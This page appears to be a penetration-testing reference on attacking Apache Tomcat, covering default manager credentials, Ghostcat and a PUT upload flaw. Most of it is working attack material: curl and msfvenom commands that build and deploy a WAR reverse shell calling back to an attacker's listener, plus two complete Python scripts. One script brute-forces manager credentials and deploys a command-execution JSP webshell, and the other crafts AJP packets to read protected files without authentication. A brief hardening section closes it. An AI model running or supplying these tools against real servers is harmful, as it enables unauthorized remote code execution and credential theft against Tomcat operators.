Service bank
WEB / APP 8080/tcp 8443/tcp 8009/tcp

Apache Tomcat

aka Tomcat, Catalina

Java servlet container, HTTP on 8080. The Manager app deploys WAR files, so credentials for a user with the manager-gui role (the /manager/html UI) or the manager-script role (the /manager/text API), whether left in tomcat-users.xml or still at a well-known default, mean a JSP webshell and RCE as the tomcat service user.

Ports

Port   Proto   Notes
8080   tcp     HTTP connector
8443   tcp     HTTPS connector
8009   tcp     AJP connector (Ghostcat, CVE-2020-1938); since 9.0.31 / 8.5.51 / 7.0.100 it is commented out in the default server.xml and, when enabled, binds to loopback and requires a secret

Fingerprint

  • Default Tomcat splash page; /manager/html and /host-manager/html (401 with realm "Tomcat Manager Application"); /docs and /examples when the sample apps are still deployed
  • Server: Apache-Coyote/1.1 on older releases (through 8.0); newer releases send no Server header by default
  • Exact version in the footer of the default error pages (e.g. a 404 for a random path), unless showServerInfo has been turned off

Key files

Path                    Holds                                                        Sensitive
conf/tomcat-users.xml   manager-gui / manager-script users and plaintext passwords   yes
conf/server.xml         connectors, the shutdown port (8005) and its command string, the AJP secret if one is set   partly
webapps/                deployed apps; a WAR dropped here is unpacked and started when autoDeploy is on   no

Default / weak creds

  • tomcat / tomcat, admin / admin, tomcat / s3cret (the commented-out example in the stock tomcat-users.xml, often simply uncommented), admin / tomcat, role1 / tomcat. Tomcat itself ships with every user commented out; live weak pairs come from uncommented examples, third-party bundles and container images, and admins.

Service users

tomcat

Known CVEs

CVE              Impact
CVE-2020-1938    Ghostcat: unauthenticated AJP request-attribute injection; read any file under a web app's root (WEB-INF/web.xml, other config) and, given an upload primitive into that root, include it as JSP for RCE. Fixed in 9.0.31 / 8.5.51 / 7.0.100
CVE-2017-12617   JSP upload via HTTP PUT when the DefaultServlet is configured with readonly=false; unauthenticated RCE on Tomcat 7.0.0 through 9.0.0 (follow-up to CVE-2017-12615)

Exploitation primitives

  • Manager app: deploy a malicious .war (msfvenom java/jsp payload) through /manager/html (manager-gui) or /manager/text (manager-script) for a shell as the tomcat user
  • Ghostcat (8009): read WEB-INF/web.xml and other config under the app root, sometimes leaking DB or manager creds; with an upload into the app root, include the upload as JSP
  • PUT a JSP straight into the document root when readonly=false on the DefaultServlet (CVE-2017-12617)
  • Default or reused manager credentials

Overview

Tomcat on 8080 serves Java web apps, and its Manager application can deploy new ones. Get into /manager and a WAR upload is a shell.

Enumeration and deploy

Check manager access with default creds. /manager/html needs the manager-gui role and /manager/text needs manager-script; 401 means the password is wrong, 403 means the password is right but the user lacks the role or the source IP is blocked by a RemoteAddrValve:

curl -s -o /dev/null -w '%{http_code}\n' -u tomcat:tomcat http://<TARGET>:8080/manager/html

Build a WAR reverse shell (have a listener on LPORT ready before the trigger step):

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f war -o s.war

Deploy it through the text interface (manager-script role); a successful deploy answers "OK - Deployed application at context path [/s]":

curl -u tomcat:tomcat -T s.war "http://<TARGET>:8080/manager/text/deploy?path=/s"

Trigger it by requesting the new context; the JSP connects back to the listener:

curl http://<TARGET>:8080/s/
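The same probe, deploy and trigger sequence in Python, as an added example rather than a tool from this page: TARGET and CRED_CANDIDATES are placeholders, the WAR is built in memory with a minimal command JSP standing in for the msfvenom payload, and the parser handles the OK/FAIL replies of the /manager/text interface (which needs the manager-script role).

```python
"""Tomcat Manager text interface: probe credentials, list apps, deploy a WAR.
Added example, not from the page. Assumes /manager/text is reachable over
HTTP basic auth for a user holding the manager-script role."""
import base64
import io
import urllib.error
import urllib.request
import zipfile

# Hypothetical target and credential list; replace with your own.
TARGET = "http://192.0.2.10:8080"
CRED_CANDIDATES = [("tomcat", "tomcat"), ("admin", "admin"), ("tomcat", "s3cret")]

# Minimal JSP that runs the 'cmd' query parameter: the same role the msfvenom
# JSP plays, kept here as a stand-in for a proper reverse shell.
CMD_JSP = """<%@ page import="java.io.*" %><%
String c = request.getParameter("cmd");
if (c != null) {
  Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", c});
  BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
  String l; while ((l = r.readLine()) != null) { out.println(l); }
}
%>"""

# web.xml that serves the JSP for a request to the bare context path.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <welcome-file-list><welcome-file>cmd.jsp</welcome-file></welcome-file-list>
</web-app>"""


def build_war(jsp_name="cmd.jsp", jsp_body=CMD_JSP):
    """Return an in-memory WAR: the JSP at the root plus WEB-INF/web.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("WEB-INF/web.xml", WEB_XML)
        z.writestr(jsp_name, jsp_body)
    return buf.getvalue()


def war_entries(war_bytes):
    """Entry names of a WAR, for checking what build_war produced."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as z:
        return z.namelist()


def parse_manager_text(body):
    """Parse a /manager/text reply: first line 'OK - ...' or 'FAIL - ...',
    followed (for 'list') by 'path:state:sessions:docbase' rows."""
    lines = body.strip().splitlines()
    ok = lines[0].startswith("OK")
    apps = [dict(zip(("path", "state", "sessions", "docbase"), l.split(":", 3)))
            for l in lines[1:] if l.count(":") >= 3]
    return ok, lines[0], apps


def manager_request(base, user, pwd, path, data=None, method="GET"):
    """One basic-auth request to the text interface; returns (status, body)."""
    req = urllib.request.Request(base + "/manager/text" + path, data=data, method=method)
    token = base64.b64encode(f"{user}:{pwd}".encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    if data is not None:
        req.add_header("Content-Type", "application/octet-stream")
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            return r.status, r.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, ""


def find_manager_creds(base, candidates):
    """401 = wrong creds; 403 = valid creds but no manager-script role (or a
    RemoteAddrValve block); 200 with an OK line on /list = script access."""
    for user, pwd in candidates:
        status, body = manager_request(base, user, pwd, "/list")
        if status == 200:
            ok, _, apps = parse_manager_text(body)
            if ok:
                return user, pwd, apps
    return None


if __name__ == "__main__":
    hit = find_manager_creds(TARGET, CRED_CANDIDATES)
    if hit:
        user, pwd, apps = hit
        print("manager-script access as", user, "apps:", [a["path"] for a in apps])
        status, body = manager_request(TARGET, user, pwd, "/deploy?path=/s&update=true",
                                       data=build_war(), method="PUT")
        print(status, body.strip())  # 'OK - Deployed application at context path [/s]'
        # then: curl 'http://<TARGET>:8080/s/?cmd=id'
```

The deploy call is the PUT that curl -T performs; update=true lets you redeploy over a context that already exists instead of getting "FAIL - Application already exists at path [/s]". Undeploy with /manager/text/undeploy?path=/s when done.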

Ghostcat — AJP file read (CVE-2020-1938)

When the AJP connector on 8009 is reachable (it only matters once it is exposed beyond loopback), inject the javax.servlet.include.* request attributes to read any file under the web application's root, including WEB-INF/ and META-INF/ which the HTTP connector never serves. WEB-INF/web.xml often leaks DB creds or manager passwords, and no authentication is needed. With ajpShooter.py from the public Ghostcat PoC:

python3 ajpShooter.py http://<TARGET> 8009 /WEB-INF/web.xml read

If the app lets you upload a file that lands anywhere under its document root (the extension does not matter), the same request attributes make Tomcat compile and include it as JSP, which is RCE: ajpShooter's eval mode instead of read. Otherwise, use any manager creds recovered from web.xml to deploy a WAR as above.
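What ajpShooter.py does on the wire, as an added example and not the tool's own code: build the AJP13 ForwardRequest carrying the javax.servlet.include.* attributes that make the DefaultServlet serve WEB-INF/web.xml as an include, send it to 8009, and parse the AJP reply packets. Host, port and target file are placeholders; the packet layout follows the AJP13 protocol (0x12 0x34 magic for client packets, "AB" for server packets, length-prefixed NUL-terminated strings).

```python
"""Ghostcat (CVE-2020-1938) on the wire: AJP13 ForwardRequest builder and
response parser. Added example; not the page's tool. Host, port and file
are placeholders."""
import socket
import struct

AJP_METHOD_GET = 2     # AJP method codes: OPTIONS=1 GET=2 HEAD=3 POST=4
SC_REQ_HOST = 0xA00B   # coded name for the Host request header
REQ_ATTRIBUTE = 0x0A   # marker for an arbitrary (name, value) request attribute
RESP_HEADERS = {1: "Content-Type", 2: "Content-Language", 3: "Content-Length",
                4: "Date", 5: "Last-Modified", 6: "Location", 7: "Set-Cookie",
                8: "Set-Cookie2", 9: "Servlet-Engine", 10: "Status",
                11: "WWW-Authenticate"}


def ajp_str(s):
    """AJP string: uint16 length, bytes, NUL terminator."""
    b = s.encode()
    return struct.pack(">H", len(b)) + b + b"\x00"


def read_str(buf, pos):
    """Inverse of ajp_str; length 0xFFFF encodes a null string."""
    n = struct.unpack(">H", buf[pos:pos + 2])[0]
    if n == 0xFFFF:
        return None, pos + 2
    return buf[pos + 2:pos + 2 + n].decode(errors="replace"), pos + 3 + n


def forward_request(path_info, uri="/asdf", host="localhost", port=8080):
    """ForwardRequest packet. The include.* attributes are normally set only
    by Tomcat itself for RequestDispatcher.include(); supplied over AJP they
    make the DefaultServlet read path_info relative to the web app root,
    which is how WEB-INF/ becomes readable."""
    attrs = {
        "javax.servlet.include.request_uri": "/",
        "javax.servlet.include.path_info": path_info,
        "javax.servlet.include.servlet_path": "/",
    }
    p = bytes([2, AJP_METHOD_GET]) + ajp_str("HTTP/1.1") + ajp_str(uri)
    p += ajp_str("127.0.0.1") + ajp_str(host) + ajp_str(host)  # remote_addr, remote_host, server_name
    p += struct.pack(">H", port) + b"\x00"                      # server_port, is_ssl
    p += struct.pack(">H", 1)                                   # one request header: Host
    p += struct.pack(">H", SC_REQ_HOST) + ajp_str(f"{host}:{port}")
    for name, value in attrs.items():
        p += bytes([REQ_ATTRIBUTE]) + ajp_str(name) + ajp_str(value)
    p += b"\xff"                                                # request terminator
    return b"\x12\x34" + struct.pack(">H", len(p)) + p


def parse_response(data):
    """Walk server packets: 4=SEND_HEADERS, 3=SEND_BODY_CHUNK, 5=END_RESPONSE.
    Returns (status, headers, body)."""
    status, headers, body, off = None, {}, b"", 0
    while off + 4 <= len(data):
        magic, length = data[off:off + 2], struct.unpack(">H", data[off + 2:off + 4])[0]
        if magic != b"AB":
            raise ValueError("bad AJP magic")
        pkt = data[off + 4:off + 4 + length]
        off += 4 + length
        kind = pkt[0]
        if kind == 4:
            status = struct.unpack(">H", pkt[1:3])[0]
            _, pos = read_str(pkt, 3)                          # status message
            count = struct.unpack(">H", pkt[pos:pos + 2])[0]
            pos += 2
            for _ in range(count):
                if pkt[pos] == 0xA0:                            # coded header name
                    name, pos = RESP_HEADERS.get(pkt[pos + 1], hex(pkt[pos + 1])), pos + 2
                else:
                    name, pos = read_str(pkt, pos)
                value, pos = read_str(pkt, pos)
                headers[name] = value
        elif kind == 3:
            n = struct.unpack(">H", pkt[1:3])[0]
            body += pkt[3:3 + n]
        elif kind == 5:
            break
    return status, headers, body


def ghostcat_read(host, ajp_port=8009, path_info="WEB-INF/web.xml"):
    """Send the request to the AJP connector and collect the reply."""
    with socket.create_connection((host, ajp_port), timeout=10) as s:
        s.sendall(forward_request(path_info))
        data = b""
        while chunk := s.recv(8192):
            data += chunk
            if b"AB\x00\x02\x05" in data:   # END_RESPONSE packet seen
                break
    return parse_response(data)


if __name__ == "__main__":
    status, headers, body = ghostcat_read("192.0.2.10")   # placeholder target
    print(status, headers.get("Content-Type"))
    print(body.decode(errors="replace"))
```

A 200 with the XML body means the connector is unpatched and unauthenticated; a 403 or an AJP-level rejection on 9.0.31+ usually means secretRequired is in force. The target file is relative to the root of the web app that owns the request URI, so to read another app's WEB-INF pass a uri under that app's context.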

Hardening

Remove the example users from tomcat-users.xml and give real users only the role they need (manager-script for automation, manager-gui for humans, never both on a shared account). Restrict /manager and /host-manager with a RemoteAddrValve in the app's META-INF/context.xml or keep them off the exposed connector entirely. Comment out the AJP connector unless a front-end proxy actually speaks AJP; if it must stay, bind it to loopback, set secretRequired="true" with a secret, and run a fixed release (9.0.31 / 8.5.51 / 7.0.100 or later) for Ghostcat. Leave the DefaultServlet at its readonly=true default so PUT cannot write JSPs.
